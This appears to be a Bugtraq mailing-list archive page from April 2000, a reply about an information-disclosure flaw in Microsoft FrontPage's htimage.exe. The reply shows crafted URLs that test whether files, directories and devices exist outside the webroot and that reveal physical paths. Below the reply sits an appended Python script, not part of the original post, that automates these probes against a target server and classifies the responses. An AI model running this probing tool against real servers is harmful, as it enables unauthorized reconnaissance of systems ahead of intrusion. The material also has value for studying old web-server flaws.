Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: sozni () USA NET (.sozni)
Date: Thu, 20 Apr 2000 10:50:50 MDT
As well, the file existence test listed under Problem #3 works for files outside of the webroot but on the same volume. For example, if your webroot is at d:\Inetpub\wwwroot, the request http://server/cgi-bin/htimage.exe/test.doc?0,0 will test for the existence of a file d:\test.doc. Note, however, that htimage.exe checks for the file d:\Inetpub\wwwroot\test.doc first and then d:\test.doc. It does not allow me to test for file existence on other volumes.

Taking this one step further, you could also use this to verify names or existence of other significant directories. For example, to verify the name of their NT directory:

http://server/cgi-bin/htimage.exe/winnt/win.ini?0,0

If indeed the NT directory is named winnt, you will get the appropriate error; otherwise you will get the Config File not found error.

You can also get the full physical path of virtual directories by doing something like this (in w2k/FP4):

http://server/cgi-bin/htimage.exe/_vti_bin?0,0

Which on my system returned:

Picture config file not found, tried the following: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi

Note, however, that if any error occurs in reading the file (such as access denied), it treats it as if the file is not found. Therefore, requests for things like pagefile.sys will return an error that the Picture config file is not found.

Oh, and one more thing: it can also be used to verify system devices such as LPT and COM ports. Yeah, big deal, but it is something to ponder:

http://server/cgi-bin/htimage.exe/lpt1?0,0
http://server/cgi-bin/htimage.exe/com1?0,0

If the device exists, the web client will seem to stall. If it doesn't exist, you get the standard error.

.sozni
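The probing described in the message above, written out as a small script. This is an added example and is not code from .sozni's post or from FrontPage; it only automates the request shape and the three response classes the post describes (the "Picture config file not found ... tried the following:" body, some other error, or a stalled connection). Assumptions: the target hostname and the 5 second timeout are placeholders, and a body that does not contain the "not found" text is taken to mean the open succeeded, since the post only says "the appropriate error" for that case. The response bodies in the test are constructed from the post's quoted text, so the classifier can be checked offline.

```python
import re
import socket
import sys
import urllib.error
import urllib.request

# Error text the post reports when htimage.exe cannot open the named file.
# Per the post, an access-denied read produces the same text, so this verdict
# means "absent or unreadable" (pagefile.sys looks the same as a missing file).
NOT_FOUND_MARKER = "Picture config file not found"
# The post shows the physical path being echoed after this phrase.
TRIED_RE = re.compile(r"tried the following:\s*(.+)", re.IGNORECASE)


def build_probe_url(server, path):
    """Request shape from the post: http://server/cgi-bin/htimage.exe/<path>?0,0"""
    return "http://%s/cgi-bin/htimage.exe/%s?0,0" % (server, path.lstrip("/"))


def classify(body):
    """Map a response body (None = no response before the timeout) to a verdict.

    Returns {"state": ..., "tried": ...} where state is one of
      "stalled"              - no response; the post observes this for device
                               names such as lpt1/com1 that exist
      "absent_or_unreadable" - the "Picture config file not found" body
      "present"              - any other response (assumption: the open got
                               past the existence check, see lead-in)
    and tried is the physical path disclosed after "tried the following:", if any.
    """
    if body is None:
        return {"state": "stalled", "tried": None}
    if NOT_FOUND_MARKER in body:
        m = TRIED_RE.search(body)
        return {"state": "absent_or_unreadable",
                "tried": m.group(1).strip() if m else None}
    return {"state": "present", "tried": None}


def probe(server, path, timeout=5.0):
    """Send one htimage.exe probe and classify the result.

    The timeout matters: per the post, a request for an existing device name
    never returns, so without it the client hangs instead of reporting 'stalled'.
    """
    url = build_probe_url(server, path)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as e:
        # htimage.exe's error page still carries the diagnostic text.
        body = e.read().decode("latin-1", "replace")
    except (socket.timeout, urllib.error.URLError) as e:
        if isinstance(e, socket.timeout) or isinstance(getattr(e, "reason", None), socket.timeout):
            return classify(None)
        raise
    return classify(body)


if __name__ == "__main__":
    # Usage: python htimage_probe.py <server> [path ...]
    # Default paths are the ones tried in the post; "server" is a placeholder host.
    target = sys.argv[1] if len(sys.argv) > 1 else "server"
    paths = sys.argv[2:] or ["test.doc", "winnt/win.ini", "_vti_bin", "pagefile.sys", "lpt1"]
    for p in paths:
        verdict = probe(target, p)
        line = "%-20s %s" % (p, verdict["state"])
        if verdict["tried"]:
            line += "  (tried: %s)" % verdict["tried"]
        print(line)
```

Because access-denied and nonexistent files collapse into the same verdict, a negative result for a path you know exists (pagefile.sys, for instance) only tells you the server could not read it, not that the name is wrong; the winnt/win.ini check in the post works because win.ini is both present and readable.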
Current thread:
- Re: More vulnerabilities in FP .sozni (Apr 20)
- <Possible follow-ups>
- Re: More vulnerabilities in FP Thomas Dullien (Apr 21)
- Re: More vulnerabilities in FP Roman (Apr 22)
- Re: More vulnerabilities in FP Daniel Dočekal (Apr 24)
- Re: More vulnerabilities in FP Ian McDonald (Apr 26)
- ISS Security Advisory: Insecure file handling in IBM frcactrl program Aleph One (Apr 26)